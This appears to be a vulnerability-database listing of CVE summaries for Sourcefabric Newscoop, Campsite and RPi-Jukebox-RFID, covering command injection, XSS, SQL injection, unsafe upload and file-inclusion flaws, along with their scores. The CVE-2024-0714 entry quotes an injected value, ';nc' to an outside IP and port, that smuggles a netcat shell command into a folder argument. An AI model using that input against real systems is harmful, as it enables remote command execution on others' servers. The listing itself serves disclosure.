Lucene search

K

Sourcefabric Security Vulnerabilities

cve
cve

CVE-2024-0714

A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444...

9.8CVSS

9.7AI Score

0.001EPSS

2024-01-19 03:15 PM
9
cve
cve

CVE-2022-36749

RPi-Jukebox-RFID v2.3.0 was discovered to contain a command injection vulnerability via the component /htdocs/utils/Files.php. This vulnerability is exploited via a crafted payload injected into the file name of an uploaded...

9.8CVSS

9.5AI Score

0.003EPSS

2022-08-30 10:15 PM
30
2
cve
cve

CVE-2010-4973

Cross-site scripting (XSS) vulnerability in the search feature in Campsite 3.4.0 allows remote attackers to inject arbitrary web script or HTML via the f_search_keywords parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party...

5.7AI Score

0.001EPSS

2022-10-03 04:21 PM
16
cve
cve

CVE-2013-0730

Multiple cross-site scripting (XSS) vulnerabilities in Newscoop 4.x through 4.1.0 allow remote attackers to inject arbitrary web script or HTML via vectors involving the (1) language parameter to application/modules/admin/controllers/LanguagesController.php or (2) user parameter to...

5.8AI Score

0.001EPSS

2022-10-03 04:15 PM
25
cve
cve

CVE-2020-11807

Because of Unrestricted Upload of a File with a Dangerous Type, Sourcefabric Newscoop 4.4.7 allows an authenticated user to execute arbitrary PHP code (and sometimes terminal commands) on a server by making an avatar update and then visiting the avatar file under the /images/...

7.8CVSS

7.8AI Score

0.0005EPSS

2020-05-19 04:15 PM
16
cve
cve

CVE-2012-1933

Multiple PHP remote file inclusion vulnerabilities in Newscoop 3.5.x before 3.5.5 and 4 before RC4, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[g_campsiteDir] parameter to (1) include/phorum_load.php, (2) conf/install_conf.php, or....

7.6AI Score

0.045EPSS

2012-08-27 09:55 PM
22
cve
cve

CVE-2012-1935

Multiple cross-site scripting (XSS) vulnerabilities in Newscoop 3.5.x before 3.5.5 and 4.x before 4 RC4 allow remote attackers to inject arbitrary web script or HTML via the (1) Back parameter to admin/ad.php, or the (2) token or (3) f_email parameter to...

5.7AI Score

0.006EPSS

2012-08-27 09:55 PM
26
cve
cve

CVE-2012-1934

SQL injection vulnerability in admin/country/edit.php in Newscoop before 3.5.5 and 4.x before 4 RC4 allows remote attackers to execute arbitrary SQL commands via the f_country_code...

8.4AI Score

0.007EPSS

2012-08-27 09:55 PM
23
cve
cve

CVE-2012-4679

Cross-site scripting (XSS) vulnerability in admin/login.php in Newscoop before 3.5.5 allows remote attackers to inject arbitrary web script or HTML via the f_user_name...

5.9AI Score

0.003EPSS

2012-08-27 09:55 PM
27